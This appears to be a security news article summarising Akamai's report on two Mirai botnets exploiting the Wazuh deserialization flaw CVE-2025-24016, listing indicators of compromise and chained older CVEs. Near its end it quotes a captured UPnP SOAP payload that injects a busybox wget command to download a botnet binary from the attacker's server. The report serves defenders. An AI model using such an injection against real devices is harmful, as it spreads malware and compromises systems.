The Security Intelligence and Response Team (SIRT) at Akamai has found that multiple Mirai-based botnets are exploiting CVE-2025-24016, a critical RCE vulnerability in Wazuh servers. This flaw, which has a CVSS score of 9.9, allows remote attackers to execute arbitrary Python code through unsanitized JSON inputs in the Wazuh Distributed API.
“This is the first reported active exploitation of this vulnerability since the initial disclosure in February 2025,” Akamai wrote in its report.
Disclosed in February 2025, CVE-2025-24016 affects Wazuh versions 4.4.0 to 4.9.0, allowing RCE via a malicious run_as request at the /security/user/authenticate/run_as endpoint.
The flaw in Wazuh is linked to the as_Wazuh_object() deserialization method in Python, which does not properly sanitize dictionary inputs.
“This can be exploited by injecting an unsanitized dictionary into DAPI requests, which can lead to evaluation of arbitrary Python code,” the report explains.
Akamai discovered two unique botnet campaigns exploiting this vulnerability, both based on Mirai malware.
The first wave appeared in early March 2025, shortly after public disclosure of the CVE, targeting IoT devices with a suite of architecture-specific binaries. The malware, dubbed “morte,” is part of the LZRD Mirai family, known for its console string “lzrd here”.
“The exploit fetches and executes a malicious shell script that serves as a downloader for the main Mirai malware payload,” the report explains.
Associated infrastructure includes:
C2 Domain: nuklearcnc.duckdns[.]org
Payload server: 176.65.134[.]62
Additional domains: cbot.galaxias[.]cc, neon.galaxias[.]cc, pangacnc[.]com
In May 2025, Akamai observed a second botnet dubbed “Resbot” exploiting the same vulnerability but using Italian-styled domain names like gestisciweb.com, suggesting targeting of Italian-speaking users.
The malware, “resgod”, prints the console string “Resentual got you!” upon execution and also targets multiple CPU architectures. Its C2 is hardcoded to 104.168.101[.]27 over TCP port 62627.
“It was using a variety of domains to spread the malware that all had Italian nomenclature… possibly alluding to the targeted geography or language spoken by the affected device owner,” the report notes.
In addition to CVE-2025-24016, the botnets were observed chaining exploits from past years, including:
CVE-2023-1389 (TP-Link)
CVE-2017-17215 (Huawei HG532)
CVE-2017-18368 (D-Link)
Exploits targeting Ivanti, UPnP, and YARN APIs
One attack string specifically crafted for UPnP exploitation via SOAP contained this payload:
<NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r /resgod.mips)</NewStatusURL>
These actions underscore a well-resourced and automated offensive campaign to compromise exposed and outdated infrastructure.